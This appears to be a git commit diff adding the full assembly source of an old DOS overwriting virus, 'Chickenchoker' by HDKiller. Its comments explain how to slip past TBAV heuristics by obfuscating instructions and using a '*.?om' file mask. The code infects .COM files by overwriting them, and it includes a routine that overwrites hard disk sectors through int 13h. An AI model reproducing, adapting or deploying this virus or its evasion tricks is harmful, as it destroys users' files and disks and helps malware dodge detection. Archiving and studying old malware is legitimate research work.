re-organize

push
2026-06-16 15:59:24 +00:00 · 2022-08-21 04:07:57 -05:00
parent 74dbd37f30
commit 4b9382ddbc
1392 changed files with 607600 additions and 607600 deletions
@@ -0,0 +1,87 @@
+;                       Chickenchoker Virus by HDKiller
+;
+;       Origianl Variant        127 bytes
+;       Fixored up Variant      132 bytes
+;
+;
+; This is a trivial variant of a basic sort, no encryption and a nasty payload
+;
+; Being HDKiller's first virus it wasnt a bad start, though I wouldnt have made
+; it destructive.
+;
+; The original version of this virus raised 2 flags in TBAV FS, one for file
+; access and one for com/exe search routine.  The S is defeated by changing the
+; original *.com with a *.?om wich is functionally the same but will cause the
+; the virus to attack .aom .bom .com etc... This makes the virus a little more
+; unstable, bet hey it's trivial.  The F is caused by mov ah,40h and can be
+; beaten any number of ways, I used a mov ah,00h then an xor ah, 40h.  Thats
+; one of countless numbers of way to get 40h into ah.  TBAV was keying on the
+; beginning of this virus to get it's determination that it's a trivial virus.
+; By adding a few lines of code you effectively loose TBAV.
+;
+Code    Segment
+        Assume CS:code,DS:code
+        Org     100h
+
+startvx proc    near
+
+        mov     ah,4eh
+;        mov     cx,0000h               ; Key point for TBAV
+        mov     cx,0013h
+lopht:                                  ; Quick and simple loop to confuse TBAV
+        loop    lopht                   ; Now that didnt take much did it ??
+        mov     dx,offset star_com
+        int     21h
+
+        mov     ah,3dh
+        mov     al,02h
+        mov     dx,9eh
+        int     21h
+
+        xchg    bx,ax
+
+;        mov     ah,40h                 ; Sets off the F in TBAV
+        xor     ah,ah                   ; One of many methods to get 40h into
+        xor     ah,40h                  ; ah.  Be imaginative when you can :)
+        mov     cx,offset endvx - offset startvx
+        mov     dx,offset startvx
+        int     21h
+
+        mov     ah,3eh
+        int     21h
+
+        int     20h
+
+szTitleName     db' Chickenchoker Virus by hdkiller has been activated'
+;szTitleName     db' ChChickenchchoker Virus by hdkiller | SOK-3'
+
+rip_hd:
+
+        xor dx,dx
+rip_hd1:
+                mov cx,2
+                mov ax,311h
+                mov dl,80h
+                mov bx,5000h
+                mov es,bx
+                int 13h
+                jae rip_hd2
+                xor ah,ah
+                int 13h
+                rip_hd2:
+                inc dh
+                cmp dh,4
+                jb rip_hd1
+                inc ch
+                jmp rip_hd
+
+startvx endp
+
+;star_com:       db      "*.com",0      ; Sets off S in TBAV
+star_com:       db      "*.?om",0       ; Sacrifice a little stability to loose
+                                        ; the S flag
+
+endvx   label   near
+
+code    ends
+        end     startvx